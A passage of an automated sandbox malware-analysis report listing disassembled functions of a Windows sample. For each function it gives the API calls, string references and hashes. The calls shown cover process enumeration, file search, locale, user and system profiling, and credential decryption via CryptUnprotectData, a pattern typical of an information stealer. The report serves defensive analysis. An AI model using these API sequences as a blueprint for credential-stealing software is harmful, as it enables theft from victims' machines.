Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
Instruction ID: 9e175830caf9148bd7a219e001ec971bef60eefc02138b6d75eb658f8e5d4480
Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
Instruction Fuzzy Hash: 94112EB5E15218ABCB24DFA0DC48BDEB7B9BB48700F00558DF509A6240EB749B84CF91

Function 0040E530 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D79), ref: 0040E5A2
StrCmpCA.SHLWAPI(?,004215F0), ref: 0040E5F2
StrCmpCA.SHLWAPI(?,004215F4), ref: 0040E608
FindNextFileA.KERNEL32(000000FF,?), ref: 0040ECDF

Strings

\*.*, xrefs: 0040E54D
@, xrefs: 0040ECF5, 0040E6EB, 0040E81C, 0040E95B, 0040E5B9, 0040E6EE, 0040E81F, 0040E95E

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*$@
API String ID: 433455689-2355794846
Opcode ID: 4facd80dccbbd4043723c6c574ff01e2e5bfa9ed397b790a3108dc60b27bc8cf
Instruction ID: 078a0cb4b8b1302ba7a9d85fb6124db0b21cd0ebb254cebb7c4a92464ee22dab
Opcode Fuzzy Hash: 4facd80dccbbd4043723c6c574ff01e2e5bfa9ed397b790a3108dc60b27bc8cf
Instruction Fuzzy Hash: A6128431A111185BCB14FB61DCA6EED7339AF54314F4045EFB10A62095EF386F98CB9A

Function 00417D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
LocalFree.KERNEL32(00000000), ref: 00417EB2

Strings

/ , xrefs: 00417E0F

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 2da6d8d46af5d9fba73089c84a9a83c4b155d377b4707f47009441765ba228f5
Instruction ID: 3a7f69f4b1fea99afaf6d133ce9a777b30b3333c02d8fb4e8698743120f63e4e
Opcode Fuzzy Hash: 2da6d8d46af5d9fba73089c84a9a83c4b155d377b4707f47009441765ba228f5
Instruction Fuzzy Hash: 1C416D71945218ABCB24DB94DC99BEEB374FF44704F2041DAE10A62280DB386FC4CFA9

Function 00413970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0041E120,00000000,00000001,0041E110,00000000), ref: 004139A8
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00413A00

Strings

,<A, xrefs: 0041398D, 00413AE4, 00413AE7

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: ,<A
API String ID: 123533781-3158208111
Opcode ID: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
Instruction ID: 4ceafe5fcd3fa6382eb1302e1b13d25b09f52af09297020757b8d8bc714daff3
Opcode Fuzzy Hash: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
Instruction Fuzzy Hash: A8410670A00A28AFDB24DF58CC95BDBB7B5AB48302F4041D9E608E7290E7B16EC5CF50

Function 00418810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
Process32First.KERNEL32(?,00000128), ref: 0041886E
Process32Next.KERNEL32(?,00000128), ref: 00418883

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

CloseHandle.KERNEL32(?), ref: 004188F1

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 08a257effb705778cf84b4ca166533fa3170df6770f95f3fc8dc4302d402ea68
Instruction ID: f2962352e5a9518fad6621e76df9ccdb14d3c152e16a9ee82315e1f5505f4b94
Opcode Fuzzy Hash: 08a257effb705778cf84b4ca166533fa3170df6770f95f3fc8dc4302d402ea68
Instruction Fuzzy Hash: 0E318171A02158ABCB24DF55DC55FEEB378EF04714F50419EF10A62190EB386B84CFA5

Function 0040A2B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
memcpy.MSVCRT(?,?,?), ref: 0040A316
LocalFree.KERNEL32(?), ref: 0040A323

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
Instruction ID: b2ce5641e7fa807fe786f78e48a01c4c7ef199da86c861ee62a52048bf8154be
Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
Instruction Fuzzy Hash: 3611ACB4900209DFCB04DF94D988AAE77B5FF88300F104559ED15A7350D734AE50CF61

Function 00417BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02D25760,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02D25760,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02D25760,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
wsprintfA.USER32 ref: 00417C47

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
Instruction ID: b2a27aae97358dcb217157a2278e60ef806da717b76b9d8dbc6f71207b10123d
Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
Instruction Fuzzy Hash: C011A1B1E0A228EBEB208B54DC45FA9BB79FB45711F1003D6F619932D0E7785A808B95

Function 004179E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
Instruction ID: 9b82aaaa51ecd1631f431d3f1c3dae0ecd6dc6cababe86b84151973db8bb3773
Opcode Fuzzy Hash: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
Instruction Fuzzy Hash: 80F04FB1D49249EBC700DF98DD45BAEBBB8EB45711F10021BF615A2680D7755640CBA1

Function 00418060 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00420E14), ref: 00418090
wsprintfA.USER32 ref: 004180A6

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
Instruction ID: 08512fc152d1616d0ad9ea22e4a9698bc695f8d0908738fe214e90ce4e812d63
Opcode Fuzzy Hash: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
Instruction Fuzzy Hash: 67F06DB1E04218ABCB10CB84EC45FEAFBBDFB48B14F50066AF51592280E7796904CAE5

Function 00407770 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00416414,?), ref: 00407784
RtlAllocateHeap.NTDLL(00000000,?,00416414,?), ref: 0040778B
lstrcatA.KERNEL32(?,02D225C8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8), ref: 0040793B
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 0040794F
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407963
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407977
lstrcatA.KERNEL32(?,02D25940,?,00416414,?), ref: 0040798B
lstrcatA.KERNEL32(?,02D25820,?,00416414,?), ref: 0040799F
lstrcatA.KERNEL32(?,02D25868,?,00416414,?), ref: 004079B2
lstrcatA.KERNEL32(?,02D258F8,?,00416414,?), ref: 004079C6
lstrcatA.KERNEL32(?,02D22650,?,00416414,?), ref: 004079DA
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 004079EE
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A02
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A16
lstrcatA.KERNEL32(?,02D25940,?,00416414,?), ref: 00407A29
lstrcatA.KERNEL32(?,02D25820,?,00416414,?), ref: 00407A3D
lstrcatA.KERNEL32(?,02D25868,?,00416414,?), ref: 00407A51
lstrcatA.KERNEL32(?,02D258F8,?,00416414,?), ref: 00407A64
lstrcatA.KERNEL32(?,02D261D0,?,00416414,?), ref: 00407A78
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A8C
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407AA0
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407AB4
lstrcatA.KERNEL32(?,02D25940,?,00416414,?), ref: 00407AC8
lstrcatA.KERNEL32(?,02D25820,?,00416414,?), ref: 00407ADB
lstrcatA.KERNEL32(?,02D25868,?,00416414,?), ref: 00407AEF
lstrcatA.KERNEL32(?,02D258F8,?,00416414,?), ref: 00407B03
lstrcatA.KERNEL32(?,02D26238,?,00416414,?), ref: 00407B16
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B2A
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B3E
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B52
lstrcatA.KERNEL32(?,02D25940,?,00416414,?), ref: 00407B66
lstrcatA.KERNEL32(?,02D25820,?,00416414,?), ref: 00407B7A
lstrcatA.KERNEL32(?,02D25868,?,00416414,?), ref: 00407B8D
lstrcatA.KERNEL32(?,02D258F8,?,00416414,?), ref: 00407BA1
lstrcatA.KERNEL32(?,02D262A0,?,00416414,?), ref: 00407BB5
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BC9
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BDD
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BF1
lstrcatA.KERNEL32(?,02D25940,?,00416414,?), ref: 00407C04
lstrcatA.KERNEL32(?,02D25820,?,00416414,?), ref: 00407C18
lstrcatA.KERNEL32(?,02D25868,?,00416414,?), ref: 00407C2C
lstrcatA.KERNEL32(?,02D258F8,?,00416414,?), ref: 00407C3F
lstrcatA.KERNEL32(?,02D26308,?,00416414,?), ref: 00407C53
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C67
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C7B
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C8F
lstrcatA.KERNEL32(?,02D25940,?,00416414,?), ref: 00407CA3
lstrcatA.KERNEL32(?,02D25820,?,00416414,?), ref: 00407CB6
lstrcatA.KERNEL32(?,02D25868,?,00416414,?), ref: 00407CCA
lstrcatA.KERNEL32(?,02D258F8,?,00416414,?), ref: 00407CDE

Part of subcall function 00407630: lstrcatA.KERNEL32(29A26020,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
Part of subcall function 00407630: lstrcatA.KERNEL32(29A26020,00000000,00000000), ref: 004076A8
Part of subcall function 00407630: lstrcatA.KERNEL32(29A26020, : ), ref: 004076BA
Part of subcall function 00407630: lstrcatA.KERNEL32(29A26020,00000000,00000000,00000000), ref: 004076EF
Part of subcall function 00407630: lstrcatA.KERNEL32(29A26020,00421934), ref: 00407700
Part of subcall function 00407630: lstrcatA.KERNEL32(29A26020,00000000,00000000,00000000), ref: 00407733
Part of subcall function 00407630: lstrcatA.KERNEL32(29A26020,00421938), ref: 0040774D
Part of subcall function 00407630: task.LIBCPMTD ref: 0040775B

lstrcatA.KERNEL32(?,02D27088,?,00000104), ref: 00407E6B
lstrcatA.KERNEL32(?,02D26038), ref: 00407E7E
lstrlenA.KERNEL32(29A26020), ref: 00407E8B
lstrlenA.KERNEL32(29A26020), ref: 00407E9B

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: cc333af4a1abb9346433ca79b5c5aa6d7562f16db6184479820995650e7c7d0f
Instruction ID: 0e0c3d68e69f6296a9396c1eab42491480c8bc0a3d7b858fcfddc2671413b035
Opcode Fuzzy Hash: cc333af4a1abb9346433ca79b5c5aa6d7562f16db6184479820995650e7c7d0f
Instruction Fuzzy Hash: E83264B6D04254ABCB14EB60DC95DDE733EAB48315F004A9EF209A2090EE79F789CF55

Function 004103B0 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

